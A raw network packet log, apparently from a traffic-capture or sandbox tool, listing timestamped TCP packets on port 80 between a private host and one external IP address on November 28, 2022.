Nov 28, 2022 12:46:57.725189924 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.725205898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725224018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725241899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725286007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.725368977 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.725547075 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.725910902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726036072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726058006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726077080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726094961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726113081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726175070 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.726201057 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.726290941 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.726738930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726881981 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.726892948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726918936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726941109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726962090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.726983070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727103949 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.727152109 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.727646112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727746010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727770090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727787971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727806091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727823973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.727823973 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.727927923 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.728049040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.728559017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728672981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728694916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728713036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728730917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728741884 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.728749037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.728847027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.728847027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.729444027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729552984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729576111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729588032 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.729593992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729612112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729629993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.729794979 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.730362892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730473042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730495930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730505943 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.730515003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730532885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730551004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.730596066 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.730757952 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.731265068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731380939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731404066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731421947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731439114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731456995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.731468916 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.731564045 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.731684923 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.732204914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732320070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732394934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732414007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732431889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732446909 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.732450008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.732656956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.733006954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.733134031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.733150959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.733167887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.733206034 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.733300924 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.737524033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737545967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737579107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737596989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737680912 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.737751007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.737760067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737781048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737798929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737852097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.737931967 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.737994909 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.738007069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738028049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738202095 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.738621950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738722086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738742113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738759041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738775015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738790989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.738831997 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.738913059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.739464998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739658117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739664078 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.739677906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739695072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739711046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739726067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.739795923 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.739908934 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.740341902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740434885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740484953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740502119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740514994 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.740559101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740586996 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.740655899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740658045 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.740675926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.740767956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.740870953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.741286039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741437912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741456985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741472006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741487026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741494894 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.741503000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741518974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.741580963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.741750956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.742283106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742393017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742412090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742427111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742441893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742458105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742472887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.742502928 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.742691040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.743191957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743299007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743319035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743335009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743350983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743359089 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.743366003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743381023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.743439913 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.743439913 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.743546963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.743896008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744012117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744079113 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.744095087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744111061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744126081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744141102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744157076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744168997 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.744194984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.744230986 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.744493008 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.744967937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745078087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745094061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745109081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745198011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745213985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745229006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745260954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745307922 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.745404005 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.745485067 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.745767117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745881081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745923996 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.745935917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745950937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745965958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745980978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.745995998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746040106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746041059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.746211052 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.746264935 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.746818066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746834040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746849060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746862888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746877909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746892929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746906996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746922016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.746968031 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.747092962 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.747483969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747617960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747682095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747698069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747711897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747726917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747729063 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.747741938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747756958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747771025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.747787952 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.747905016 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.747976065 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.748605013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748740911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748756886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748770952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748797894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748812914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748826981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748841047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748855114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.748867035 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.748939037 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.748959064 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.749063969 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.749346972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749485016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749567986 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.749608040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749650955 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.749684095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749699116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749713898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749728918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749742985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749757051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.749855042 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.749905109 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.750426054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750543118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750557899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750571966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750586033 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.750592947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750607967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750622034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750650883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750693083 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.750741959 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.750843048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.750874043 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.750981092 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751306057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751449108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751475096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751512051 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751548052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751575947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751611948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751626968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751656055 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751709938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751799107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751844883 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751854897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751869917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751883984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751899004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751909971 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751914024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751928091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751955986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.751964092 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.751971006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752005100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752008915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752013922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752027988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752043009 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.752177954 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.752274036 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.752655029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752800941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752815962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752927065 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.752928972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752943993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752959013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752973080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.752986908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753000975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753015041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753029108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753043890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753057957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753072023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753086090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753099918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753331900 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.753501892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.753767014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753859997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753916979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.753926039 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.753971100 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.753978014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754025936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754040003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754064083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754081964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754096985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754105091 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.754112005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754126072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754142046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754153013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.754156113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754170895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754235029 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.754383087 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.754703045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754826069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754889965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754904985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754905939 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.754920006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754935026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754949093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754964113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754977942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.754992008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755006075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755019903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755032063 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.755033970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755064011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.755103111 CET	49836	80	192.168.11.20	172.67.203.65
